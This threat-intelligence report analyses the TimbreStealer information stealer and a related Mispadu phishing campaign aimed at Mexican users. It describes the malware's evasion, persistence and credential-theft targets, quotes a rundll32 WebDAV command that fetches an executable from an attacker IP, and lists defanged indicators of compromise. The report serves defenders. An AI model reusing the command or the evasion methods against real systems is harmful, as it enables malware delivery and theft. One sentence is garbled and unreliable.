- Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware we’re calling “TimbreStealer.”
- This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”
- TimbreStealer is a new obfuscated information stealer found targeting victims in Mexico.
- It contains several embedded modules used for orchestration, decryption and protection of the malware binary.
Talos has observed an ongoing phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023. This campaign uses phishing emails with financial themes, directing users to a compromised website where the payload is hosted and tricking them into executing the malicious application.
Talos has observed new distribution campaigns being conducted by this threat actor since at least September 2023, when they were initially distributing a variant of the Mispadu banking trojan using geofenced WebDAV servers before changing the payload to this new information-stealer. After the threat actor changed to this new stealer, we haven’t found any evidence of Mispadu being used anymore.
The phishing campaign uses geofencing techniques to only target users in Mexico, and any attempt to contact the payload sites from other locations will return a blank PDF file instead of the malicious file. The current spam run was observed to mainly use Mexico's digital tax receipt standard called CDFI (which stands for “Comprobante Fiscal Digital por Internet,” or online fiscal digital invoice in English). Talos has also observed emails using generic invoice themes used for the same campaign.
Although we could not find hard evidence linking the two campaigns, we assess with high confidence they are operated by the same threat actor, based on the same TTPs observed in this campaign and the previous activity distributing Mispadu, and the fact that once TimbreStealer started being distributed, we could not find any more evidence of Mispadu being used.
TimbreStealer, a new obfuscated information stealer
Talos has identified a new family of information stealers while investigating a spam campaign targeting Mexican users starting in November 2023. The name TimbreStealer is a reference to one of the themes used in the spam campaign which we will analyze later.
TimbreStealer exhibits a sophisticated array of techniques to circumvent detection, engage in stealthy execution, and ensure its persistence within compromised systems. This includes leveraging direct system calls to bypass conventional API monitoring, employing the Heaven’s Gate technique to execute 64-bit code within a 32-bit process, and utilizing custom loaders. These features indicate a high level of sophistication, suggesting that the authors are skilled and have developed these components in-house.
The sample we’re analyzing was found on a victim machine following a visit to a compromised website after the users clicked on a link present in a spam email.
Our analysis identified several modules embedded in the malware’s “.data” section, and a complex decryption process involving a main orchestration DLL and a global decryption key which is used throughout the different modules and updated at each stage. While this analysis is not yet complete, we wanted to describe at least the initial modules and their relationship.
TimbreStealer’s Decryption Process
This first layer executable is packed and includes an embedded DLL in its “.data” section. The loader will first scan Ntdll for all of the Zw* exports and build an ordered hash table of the functions. All sensitive APIs from this point will be called with direct system calls into the kernel. For 64-bit machines, this will include a transition from 32-bit to 64-bit mode through Heaven’s Gate before the syscall is issued.
Once this is complete, it will then decrypt the next stage payload from the .data section. The decrypted DLL has its MZ header and PE signature wiped, a technique we will see throughout this malware. A custom PE loader now launches the DLL passing the Zw* hash table as an argument to its exported function.
Decryption of all submodules makes use of a global decryption key. As the execution of the malware progresses, this key is encrypted over and over again. If execution does not follow every step of the expected path, the decryption key will get out of sync and all subsequent decryptions will fail.
This prevents reverse engineers from short-cutting the logic to force decryptions or statically extracting arguments to access the payloads. This means every anti-analysis check has to be located and circumvented. Encryption rounds on the global key are scattered about in the code and even occur from within the different sub-modules themselves.
All stages of this malware use the same coding style and techniques. We therefore assess with high confidence that all obfuscation layers and final payload were developed by the same authors.
TimbreStealer’s embedded modules
Once the initial layer is extracted, TimbreStealer will check if the system is of interest and whether or not it’s being executed in a sandbox environment. It will also extract the many submodules embedded in the payload. Talos identified at least three different layers after the main payload was extracted, with several modules in each layer used for different functions:
The second stage of the malware is the orchestrator layer, which is responsible for detecting systems of interest and extracting all subsequent modules. To determine if the system is of interest to the attackers, the malware first checks that the system language is not Russian, and then checks the timezone to ensure it is within a Latin American region. This is followed by CsrGetProcessId debugger checks and counting desktop child windows to ensure it is not running in a sandbox environment.
At this stage the malware will also do a mutex check, look for files and registry keys that may be indicative of previous infection, and scan the system browsers for signs of natural use. The files and registry keys checked by the malware include the non-exhaustive list below:
- HKLM\SOFTWARE\Microsoft\CTF\TIP\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}
- {A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = <value>
- {E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = <value>
- {DB2D2D69-9EE0-9A3C-2924-67021A31F870} = <value>
- {6EF3E193-61BF-4F68-9736-51CF6905709D} = <value>
- {3F80FA11-1693-4D05-AA83-D072E69B77FC} = <value>
- {419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = <value>
- C:\Windows\Installer\{E1284A06-8DFA-48D4-A747-28ECD07A2966}
- Global\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U
The presence of these keys along with other checks mentioned before will prevent the execution of the remaining stages of the malware.
The orchestrator contains four other encrypted sub-modules within it.
All blobs are accessed through a parent loader function which verifies the expected Zlib CRC32 hash of data and can optionally decompress the raw data if specified. This overall architecture has been observed in all layers.
Each stripped DLL is loaded by a custom shellcode loader from submodule #0 (IDX = 0). Execution is transferred to this shellcode through a Heaven’s Gate stub using the ZwCreateThreadEx API.
Submodule No. 2 is an anti-analysis DLL that performs several checks and does scattered rounds of encryption on the global decrypt buffer. If any check fails, the installer module will not decrypt properly. Checks in this layer include:
- VMWare hook and port checks.
- Vpcext, IceBP, int 2D instructions to detect debuggers.
- Checking physical drive for strings: qemu, virtual, vmware, vbox, xensrc, sandbox, geswall, bufferzone, safespace, virtio, harddisk_ata_device, disk_scsi_disk_device, disk_0_scsi_disk_device, nvme_card_pd, google_persistentdisk.
If all of these checks complete as expected, then the final module can be decrypted successfully.
Submodule No. 3 is the installer layer, which will drop several files to disk and trigger execution. A benign decoy document will also be displayed to help defer suspicion.
Execution is triggered by registering a task through the ITaskService COM interface. The scheduled task uses Microsoft’s reg.exe to add a run once registry key, and then trigger rundll32.exe to process this entry through the system iernonce.dll.
Under certain conditions, this layer can also modify Group Policy options to set startup scripts.
TimbreStealer’s Installed DLL modules
The installed DLL named Cecujujajofubo475.dll uses the same overall architecture as the first DLL detailed above, with all of its internal strings encrypted, uses a global decrypt buffer, and uses a different Zw* API hash table to perform direct syscalls avoiding user API.
In this layer there are also TLS callbacks to add complexity to global decrypt buffer encryption. An extra round of encryption has also been added that depends on the parent process name and value within the registry key given above to prevent analysis on 3rd party machines.
This DLL contains eight encrypted sub-modules within it:
(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.
While this DLL contains many of the same protections found in the installation phase, several more have been identified in this layer. The first is a patch to the ZwTraceEvent API to disable user mode Event Tracing for Windows data collection.
Another interesting protection overwrites all of the loaded DLLstwo-stagein the process with clean copies from the that disk. This will wipe all Antivirus vendor user mode hooks, software breakpoints, and user patches during execution.
This DLL serves as a loader for the final payload which is housed within the ApplicationIcon.ico file shown in the previous relationship diagram. Submodule No. 7 will be the default loader that Submodule attempts to launch. They attempt to inject this 64-bit DLL into a preferred list of svchost.exe processes.
The order of preference is based on svchost.exe process command line, looking for the following strings:
- DcomLaunch
- Power
- BrokerInfrastructure
- LSM
- Schedule
If the injections into svchost.exe fail, then a backup 32-bit fallback shellcode is also available. In this mode a two-stage shellcode is loaded from sub-module No. 6 and execution is transferred to it. A new thread is created using syscalls with a modified context, and then ResumeThread triggers its execution. All memory allocations for the shellcode are also executed through the syscall mechanism set up earlier.
The first stage of the shellcode will decrypt its second stage, and then extract and decrypt the final payload DLL from the ApplicationIcon.ico file. The 32 bit version will again use a custom PE loader to directly load and run the final payload DLL within its own process after extraction.
TimbreStealer’s Final Payload Module
The architecture of this layer is the same as all of the previous and contains an additional nine sub-modules. Analysis of this final payload module and submodules is still ongoing at the time of writing:
(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.
The following is a preliminary analysis of the malware features based on the strings we were able to decrypt from this module. They indicate the malware can collect a variety of information from the machine and post data to an external website, which is typical behavior of an information stealer.
Collect credential information from the victim’s machine
The following strings were found in functions scanning files and directories. This module also embeds the SQLite library to handle different browsers' credential storage files.
- CloudManagementEnrollmentToken
- Google\\Chrome Beta\\User Data
- Google\\Chrome Dev\\User Data
- Google\\Chrome SxS\\User Data
- Google\\Chrome\\User Data
- Google\\Policies
- Microsoft\\Edge Beta\\User Data
- Microsoft\\Edge Dev\\User Data
- Microsoft\\Edge\\User Data
- Software\\Google\\Chrome
- Software\\Google\\Chrome\\Enrollment
- Software\\Google\\Enrollment
- Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}
- SOFTWARE\\Microsoft\\Cryptography
- Software\\Policies\\Google\\Chrome
- Software\\Policies\\Google\\Update
- history
- feeds
- feeds cache
- internet explorer
- media player
- office
- OneDrive
- packages
- Skydrive
- Formhistory.sqlite
- SELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;
- SELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`
- Mozilla\\Firefox\\Profiles\\
- Thunderbird\\Profiles\\
- Postbox\\Profiles\\
- PostboxApp\\Profiles\\
- SOFTWARE\\Mozilla\\Mozilla Firefox
- SOFTWARE\\Mozilla\\Mozilla Thunderbird
- SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList
Search for Files
The malware also scans several directories looking for files although it’s not clear yet for what purpose. We can see in the list below folders related to AdwCleaner, Avast Scanner as well as 360 Antivirus quarantine folders.
Another set of interesting strings in this list are “.Spotlight-V100” and “.fseventsd” which are related to MacOS.
- $360Section
- $AV_ASW
- $GetCurrent
- $Recycle.Bin
- $SysReset
- $WinREAgent
- .fseventsd
- .Spotlight-V100
- AdwCleaner
- AMD
- Autodesk
- boot
- Brother
- Config.Msi
- Documents and Settings
- EFI
- Hewlett-Packard
- inetpub
- Intel
- MSOCache
- PerfLogs
- Program Files
- Program Files (x86)
- ProgramData
- Recovery
- RecoveryImage
- Resources
- SWSetup
- System Volume Information
- SYSTEM.SAV
- ~MSSETUP.T
- $WINDOWS.
- AutoKMS
- KMSAuto
- Users
- AppData\\Local
- AppData\\Roaming
- Desktop
- Documents
- Downloads
- OneDrive
- Dropbox
Collect OS information
TimbreStealer uses the Windows Management Instrumentation (WMI) interface and registry keys to collect a wealth of information about the machine where it’s running.
- OS Information: Description, IdentifyingNumber, Manufacturer, Name, Product, ReleaseDate, InstallDate, InstallTime
- SMB BIOS information: SMBIOSBIOSVersion, SMBIOSMajorVersion, SMBIOSMinorVersion, SerialNumber, Vendor, Version
- Hardware information: Win32_ComputerSystemProduct, Win32_BaseBoard, Win32_Bios, Win32_PhysicalMemory
- Network Domain Information: StandaloneWorkstation, MemberWorkstation, StandaloneServer, MemberServer, BackupDomainController, PrimaryDomainController
- Application information: DisplayName, Publisher, DisplayVersion, OSArchitecture
Search for file extensions
The code also looks for a specific list of file extensions. Note that the extension “.zuhpgmcf” below is not associated with any known file type. This may be indicative of a file that is created by the malware itself.
- .bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf
Look for URLs Accessed
The strings below represent URLs of interest to the malware. It also contains mentions of a virtual device used to capture network packets, which may be indicative that the malware can do network sniffing.
- npf
- npcap
- npcap_wifi
- www.google.com
- amazon.com
- dropbox.com
- linkedin.com
- twitter.com
- wikipedia.org
- facebook.com
- login.live.com
- apple.com
- www.paypal.com
Disable System Protections
The malware executes calls to a function used to remove System Restore points on the machine. This is a typical behavior of Ransomware malware although Talos have not observed any Ransomware activity on infected victims. Additional analysis is still needed in order to confirm or discard this hypothesis.
- SELECT * FROM SystemRestore
- SequenceNumber
- SrClient.dll
- SRRemoveRestorePoint
- SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Power
- HiberbootEnabled
Look for Remote Desktop Software
The malware attempts to access services and Mutex used by Remote Desktop servers. It’s not clear yet how this is used in the payload code.
- console
- TermService
- Global\\TermSrvReadyEvent
- winlogon.exe
- console
POST data to remote site
A list of URLs along with strings used in HTTP communication was found in functions accessing the network. These URLs don’t conform to the format of other URLs used in the distribution of TimbreStealer. We believe these to be the command and control servers used by the malware, but so far, the samples we analyzed have not communicated back to any of them.
- POST
- PUT
- Content-Disposition: form-data; name="
- "; filename="
- "\\r\\nContent-Type: application/octet-stream\\r\\n
- Content-Type: multipart/form-data; boundary=
- Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
- HTTP/1.1 200 OK\\r\\nDate: %s %s GMT\\r\\nConnection: Close\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\r\\nContent-Type: text/plain;charset=UTF-8\\r\\n\\r\\n
- https://hamster69[.]senac2021[.]org/~armadillo492370/
https://snapdragon50[.]crimsondragonemperor[.]com
/~aster963249/https://69[.]64[.]35[.]1/~route649289/
These strings are just a small piece of this puzzle, and more analysis is required on the final payload and its embedded modules to understand their exact purpose.
Previous Mispadu spam campaign
Activity associated with these current distribution campaigns was first observed in September 2023 when the threat group was distributing a variant of the Mispadu information stealer. This campaign was using compromised websites to distribute a Zip archive containing a “.url” file which used a WebDAV file path to execute an externally hosted file upon the victim double clicking on it.
Both URLs are remote UNC paths and use a port specification of “@80” to force the connection to occur via WebDAV. This connection is performed by Rundll32.exe with the parameters shown in the example below:
- rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80 http://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe
During the campaign, all WebDAV servers were geofenced to allow connections only from IP addresses located in Mexico.
The .url files were named in multiple ways but almost always contained “RFC,” a reference to the Registro Federal de Contribuyentes (Federal Taxpayers Registry), suggesting the lure was financially related. The .url file names also typically contained 6 random digits.
The Mispadu payload contained a hardcoded C2 address which used HTTPS as communication protocol. We have seen a variety of C2 URLs, changing up over time but keeping a similar pattern pointing to “it.php” with two parameters “f” and “w”:
- hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
- hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
- hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
- hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
- hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010
We observed this campaign to be active until the middle of November, at which time a new payload with TimbreStealer was dropped on the victim's computers from the compromised website.
The target industries of this campaign is spread around different verticals with a slight focus on manufacturing and transportation as we can see below:
Spam campaign using CDFI as lure
Talos detected a low-volume campaign using CDFI to lure users to download and execute a malicious file disguised as a PDF document starting around the middle of November and still ongoing as of February 2024. CDFI is a mandatory electronic invoice standard used in Mexico for purposes of Tax reporting. In this campaign, a spam email was used as the lure to redirect users to a malicious web page hosted on compromised websites.
The Subjects we observed in this campaign follow the same theme:
- Recibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c
- Recibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288
The website uses Javascript to detect characteristics of the user such as geolocation and browser type and then initiates the download of a Zip file containing a .url file, which in turn will download the initial TimbreStealer dropper using WebDAV. The Zip file is usually named following the same theme:
- CFDI_930209.zip
- FACTURA_560208.zip
In case the access does not come from Mexico, a blank PDF is served instead of the malicious payload.
All the URLs for this current campaign follow a similar format:
- hxxps://<some>.<compromised>[.]<web>/<token>/<14_char_hex_id>
Where <token> above is one of the following strings: “cfdi”, “factura”, “timbreDigital”, “facdigital” or “seg_factura”. The first part of the domain is also a random Spanish word related to digital invoices followed by two numbers.
- hxxps://pdf85[.]miramantolama[.]com/
factura/74f871b7ca1977 - hxxps://suscripcion24[.]facturasonlinemx[.]com/
factura/d6a6f8208ed508 - hxxps://suscripcion65[.]g1ooseradas[.]buzz/
factura/9f03d9ef3d73b5 - hxxps://timbrado11[.]verificatutramite[.]com/
facdigital/f7640878ebc0f9
The .url file this time contains more obfuscation intended to make detection by Antivirus products more difficult, yet it still uses WebDAV via HTTP to download the malicious file and an icon representing a PDF file:
User interaction is required to open the downloaded Zip file and double-click on the .url file for the malware to execute, at which point the TimbreStealer main infection will start.
ATT&CK TTPs Used in TimbreStealer Campaign
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The following Snort SIDs are applicable to this threat: 63057 - 63072 and 300840 - 300844.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:
- Win.Infostealer.TimbreStealer-10021027-0
- Win.Infostealer.TimbreStealer-10021026-0
- Win.Infostealer.Generic-10017202-0
- Win.Packed.Generic-10019162-0
- Win.Dropper.Generic-10017203-0
Indicators of Compromise
IOCs for this research can be found in our GitHub repository here.
Potential C2 URLs
hxxps://hamster69[.]senac2021[.]org/~armadillo492370/
hxxps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/
hxxps://69[.]64[.]35[.]1/~route649289/
IPs
24[.]199[.]98[.]128
159[.]89[.]50[.]225
104[.]131[.]169[.]252
104[.]131[.]67[.]109
137[.]184[.]108[.]25
137[.]184[.]115[.]230
138[.]197[.]34[.]162
142[.]93[.]50[.]216
143[.]244[.]144[.]166
143[.]244[.]160[.]115
146[.]190[.]208[.]30
157[.]230[.]238[.]116
157[.]245[.]8[.]79
159[.]223[.]96[.]160
159[.]89[.]226[.]127
159[.]89[.]90[.]109
162[.]243[.]171[.]207
167[.]71[.]24[.]13
167[.]71[.]245[.]175
167[.]71[.]246[.]120
192[.]241[.]141[.]137
24[.]144[.]96[.]15
45[.]55[.]65[.]159
64[.]225[.]29[.]249
Drop Site URLs
hxxp://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc
hxxp://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282
hxxp://pdf43[.]marcialledo[.]com/factura/50e1e86db86ff2
hxxp://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb
hxxps://0[.]solucionegos[.]top/timbreDigital/e99522f778ea6a
hxxps://auditoria38[.]meinastrohoroskop[.]com/factura/b5b0c16b999573
hxxps://auditoria42[.]altavista100[.]com/factura/b20569ae393e7e
hxxps://auditoria67[.]mariageorgina[.]com/cfdi/bb743b25f5c526
hxxps://auditoria7[.]miramantolama[.]com/factura/d84d576baf1513
hxxps://auditoria82[.]taoshome4sale[.]com/seg_factura/efebfc104991d4
hxxps://auditoria84[.]meinastrohoroskop[.]com/timbreDigital/8f7b2f8304d08e
hxxps://auditoria88[.]mariageorgina[.]com/factura/3db4832ada4f80
hxxps://auditoria89[.]venagard[.]com/timbreDigital/f6a5f34123d980
hxxps://auditoria92[.]venagard[.]com/factura/2c6652a143f815
hxxps://auditoria93[.]serragrandreunion[.]com/timbreDigital/a2e79b61ac4635
hxxps://comprobante14[.]miramantolama[.]com/seg_factura/fb0b02b2d41b12
hxxps://comprobante2[.]marcialledo[.]com/factura/3ce069ac2b865e
hxxps://comprobante27[.]mariageorgina[.]com/timbreDigital/eada68119275aa
hxxps://comprobante27[.]serragrandreunion[.]com/facdigital/bca7513c9e00b9
hxxps://comprobante27[.]servicioslocomer[.]online/factura/2003b3fe7ae6f4
hxxps://comprobante45[.]altavista100[.]com/cfdi/d13011c95ba2b0
hxxps://comprobante51[.]meinastrohoroskop[.]com/facdigital/121c0388193ba5
hxxps://comprobante63[.]serragrandreunion[.]com/facdigital/3c45bca741d4f6
hxxps://comprobante68[.]portafoliocfdi[.]com/seg_factura/58c0146a753186
hxxps://comprobante70[.]miramantolama[.]com/timbreDigital/18665ae0a7b9e1
hxxps://comprobante75[.]meinastrohoroskop[.]com/timbreDigital/bfa30824f1120b
hxxps://comprobante80[.]serragrandreunion[.]com/timbreDigital/bf4a8735ed3953
hxxps://comprobante91[.]servicioslocomer[.]online/timbreDigital/adb6403b186182
hxxps://comprobante93[.]venagard[.]com/cfdi/57880f98ef2b70
hxxps://cumplimiento19[.]altavista100[.]com/timbreDigital/dd141e683a3056
hxxps://cumplimiento35[.]solucionegos[.]top/factura/bde64155cabbe5
hxxps://cumplimiento39[.]meinastrohoroskop[.]com/seg_factura/d4e9d7823adff2
hxxps://cumplimiento43[.]commerxion[.]buzz/facdigital/1ac5acb1a5525b
hxxps://cumplimiento47[.]solucionegos[.]top/seg_factura/7fa6018dc9b68f
hxxps://cumplimiento48[.]callarlene[.]net/seg_factura/c19a0dd4addc3e
hxxps://cumplimiento56[.]timbradoelectronico[.]com/facdigital/dd37434dcde7ad
hxxps://cumplimiento72[.]serragrandreunion[.]com/seg_factura/92cd2425a6c150
hxxps://cumplimiento81[.]paulfenelon[.]com/cfdi/20149ee8e1d3b2
hxxps://cumplimiento91[.]miramantolama[.]com/seg_factura/e907d32bf0d056
hxxps://cumplimiento94[.]meinastrohoroskop[.]com/cfdi/bd56529f9d1411
hxxps://cumplimiento98[.]serragrandreunion[.]com/factura/3f209bc16cbb9a
hxxps://factura10[.]miramantolama[.]com/factura/039d9cbaeec9b5
hxxps://factura20[.]facturascorporativas[.]com/seg_factura/9622cf8c695873
hxxps://factura20[.]solunline[.]top/cfdi/6401eac16211b2
hxxps://factura34[.]changjiangys[.]net/facdigital/52490c838bd94f
hxxps://factura4[.]servicioslocomer[.]online/cfdi/f2369d09a54ad9
hxxps://factura40[.]miramantolama[.]com/cfdi/9318466130e6af
hxxps://factura44[.]servicioslocales[.]online/cfdi/25e8a6f5393e1f
hxxps://factura46[.]facturasfiel[.]com/factura/021bd5fa122bb2
hxxps://factura49[.]marcialledo[.]com/factura/fc2cc5bf671dd0
hxxps://factura50[.]callarlene[.]net/cfdi/867d138f26fb23
hxxps://factura59[.]altavista100[.]com/seg_factura/0179ae05a51830
hxxps://factura7[.]taoshome4sale[.]com/factura/eebf49f810a0a6
hxxps://factura71[.]servicioslomex[.]online/timbreDigital/5de7db415c7e8e
hxxps://factura72[.]serragrandreunion[.]com/seg_factura/728423dceff50c
hxxps://factura73[.]mariageorgina[.]com/cfdi/71deea8cdbcb10
hxxps://factura81[.]altavista100[.]com/factura/8421cd5cb1c8e4
hxxps://factura90[.]changjiangys[.]net/timbreDigital/029a6531330379
hxxps://factura91[.]servicioslocomer[.]online/timbreDigital/2952b54a9542f1
hxxps://folio24[.]serragrandreunion[.]com/seg_factura/548b685f48dd30
hxxps://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc
hxxps://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282
hxxps://folio53[.]mariageorgina[.]com/seg_factura/ca2fd939c046fa
hxxps://folio60[.]callarlene[.]net/seg_factura/367b377baf47e5
hxxps://folio75[.]taoshome4sale[.]com/cfdi/7482bf3f2690af
hxxps://folio75[.]venagard[.]com/cfdi/7718efe0fd3952
hxxps://folio76[.]miramantolama[.]com/cfdi/a74b25b75c7182
hxxps://folio83[.]altavista100[.]com/factura/20f00b7d569c85
hxxps://folio89[.]changjiangys[.]net/factura/b645784e80f71a
hxxps://folio90[.]servicioslocomer[.]online/facdigital/d1950dc8f24757
hxxps://folio99[.]solunline[.]top/facdigital/b7928d4e0eade5
hxxps://pdf21[.]changjiangys[.]net/cfdi/2f99e7adf61c47
hxxps://pdf33[.]venagard[.]com/timbreDigital/91849e7d9fe4ad
hxxps://pdf34[.]solucionpiens[.]top/seg_factura/2dfed5bc7fcbf6
hxxps://pdf39[.]facturasonlinemx[.]com/seg_factura/66971f3669145a
hxxps://pdf49[.]marcialledo[.]com/factura/729c18972d690c
hxxps://pdf50[.]changjiangys[.]net/factura/cdb5ed3876c4bf
hxxps://pdf57[.]visual8298[.]top/factura/5239e15a8324ab
hxxps://pdf59[.]venagard[.]com/cfdi/5791bf23c6929e
hxxps://pdf63[.]paulfenelon[.]com/timbreDigital/3ae250718da0ca
hxxps://pdf65[.]verificatutramite[.]com/facdigital/e1ec8098e50a0b
hxxps://pdf70[.]mariageorgina[.]com/cfdi/fab1264f158f44
hxxps://pdf81[.]photographyride[.]com/seg_factura/4eb3832fe6d1bd
hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977
hxxps://pdf93[.]venagard[.]com/factura/f24a53f8932b3f
hxxps://pdf98[.]solunline[.]top/timbreDigital/f57e558c31a86e
hxxps://portal27[.]marcialledo[.]com/timbreDigital/f8a5f05b3c1651
hxxps://portal34[.]solunline[.]top/cfdi/a068bb0da7eea1
hxxps://portal48[.]solucionpiens[.]top/timbreDigital/15ec5fc2aaf26a
hxxps://portal50[.]solucionegos[.]top/factura/8d4c6f7e2a4c7f
hxxps://portal55[.]solucionegos[.]top/seg_factura/f5f59070b20629
hxxps://portal63[.]paulfenelon[.]com/seg_factura/77907fa76c7c59
hxxps://portal70[.]solunline[.]top/timbreDigital/92b380d91a67a0
hxxps://portal80[.]changjiangys[.]net/cfdi/2224782a3b7f1d
hxxps://portal86[.]serragrandreunion[.]com/facdigital/68da4282591283
hxxps://portal90[.]meinastrohoroskop[.]com/factura/64f247c6238c38
hxxps://portal92[.]solucionpiens[.]top/timbreDigital/34893de446d532
hxxps://suscripcion0[.]venagard[.]com/timbreDigital/5c86c63ca1ffda
hxxps://suscripcion10[.]solunline[.]xyz/facdigital/ebe0cb51090e51
hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508
hxxps://suscripcion24[.]venagard[.]com/timbreDigital/50c6f1fad17f5e
hxxps://suscripcion32[.]servicioslocomer[.]online/facdigital/22ccd8880c217e
hxxps://suscripcion38[.]eagleservice[.]buzz/cfdi/6dadfe1a18cffc
hxxps://suscripcion38[.]mariageorgina[.]com/factura/9c787623800b5e
hxxps://suscripcion57[.]changjiangys[.]net/factura/22ad73593f724a
hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5
hxxps://suscripcion84[.]taoshome4sale[.]com/cfdi/e4af3e6e22a8a6
hxxps://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb
hxxps://timbrado0[.]meinastrohoroskop[.]com/cfdi/515c9b9087c737
hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9
hxxps://timbrado16[.]taoshome4sale[.]com/timbreDigital/259029c9d7f330
hxxps://timbrado17[.]marcialledo[.]com/factura/2ea580ee99d5f1
hxxps://timbrado17[.]mariageorgina[.]com/seg_factura/95a6c2c0e004d8
hxxps://timbrado2[.]serviciosna[.]top/facdigital/c5cb33d68be323
hxxps://timbrado2[.]solucionegos[.]top/seg_factura/7c867709e85c67
hxxps://timbrado33[.]meinastrohoroskop[.]com/timbreDigital/aaf2cc575db42c
hxxps://timbrado42[.]mariageorgina[.]com/facdigital/f0f82ab0c87b32
hxxps://timbrado54[.]changjiangys[.]net/cfdi/04e4e38338d82a
hxxps://timbrado6[.]meinastrohoroskop[.]com/cfdi/5290b37e80850a
hxxps://timbrado73[.]mariageorgina[.]com/timbreDigital/ff862f9245e8b6
hxxps://timbrado74[.]callarlene[.]net/timbreDigital/eb52e334a2c0b3
hxxps://timbrado74[.]mexicofacturacion[.]com/factura/14fcb6e3eaf351
hxxps://timbrado80[.]paulfenelon[.]com/timbreDigital/684bc3f7d7e7f9
hxxps://timbrado84[.]miramantolama[.]com/cfdi/18864dcecc9e9c
hxxps://timbrado90[.]porcesososo[.]online/factura/cde31eb6fcac1d
hxxps://timbrado96[.]paulfenelon[.]com/facdigital/ef18828525a8fb
hxxps://validacion22[.]hb56[.]cc/seg_factura/8f845f6ba70820
hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010
Domains
trilivok[.]com
chidoriland[.]com
manderlyx[.]com
bailandolambada[.]com
0[.]solucionegos[.]top
auditoria38[.]meinastrohoroskop[.]com
auditoria42[.]altavista100[.]com
auditoria67[.]mariageorgina[.]com
auditoria7[.]miramantolama[.]com
auditoria82[.]taoshome4sale[.]com
auditoria84[.]meinastrohoroskop[.]com
auditoria88[.]mariageorgina[.]com
auditoria89[.]venagard[.]com
auditoria92[.]venagard[.]com
auditoria93[.]serragrandreunion[.]com
comprobante14[.]miramantolama[.]com
comprobante2[.]marcialledo[.]com
comprobante27[.]mariageorgina[.]com
comprobante27[.]serragrandreunion[.]com
comprobante27[.]servicioslocomer[.]online
comprobante45[.]altavista100[.]com
comprobante51[.]meinastrohoroskop[.]com
comprobante63[.]serragrandreunion[.]com
comprobante68[.]portafoliocfdi[.]com
comprobante70[.]miramantolama[.]com
